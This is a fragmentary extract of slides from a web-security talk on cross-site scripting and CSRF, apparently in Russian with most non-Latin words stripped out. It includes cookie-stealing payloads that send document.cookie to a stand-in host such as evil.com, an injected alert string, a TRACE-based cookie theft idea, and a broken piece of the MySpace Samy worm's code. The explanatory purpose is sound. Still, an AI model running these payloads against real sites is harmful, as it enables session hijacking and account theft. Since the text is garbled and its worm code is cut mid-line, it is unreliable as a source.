- 90% - ( UK) ( NTA Monitor).
- CERT advisory XSS 02.02.2000, xss mail.li.ru 30 .
7. Sokr.Ru:
8. http://myappsecurity.blogspot.com/
9. Hey, Jacks
10. XSS (Cross Site Scripting)
- img1.src='evil.com?' + cookie;
- setTimeout loop + remote reqs JS- .com/control.cgi
12. XSS
- $text = q{a/;alert(42);/};
13. CSRF (X Site Request Forgery)
14. CSRF
15. CSRF
- : XmlHttpRequest * mhtml MSIE vuln = GET .
16. All your cookies are belong to us
- img1.src = 'http://.com/' + document.cookie;
- TRACE / HTTP/1.1 Cookies: XHR squid
- Click to Enter YOUR Bank!!
- XSS+AJAX = JavaScript, URL!
19. Javascript is the new shellcode
- MySpace worm, samy is my hero, 2004
- {var E=document.location.search;var
F=E.substring(1,E.length).split('&');var AS=new Array();for(var
O=0;O0){N+='&'}var
- OWASP 2007 . XSS shell & sql injections.
- client-side persistence (visited links, cache).
- MySpace worm samy is my hero, .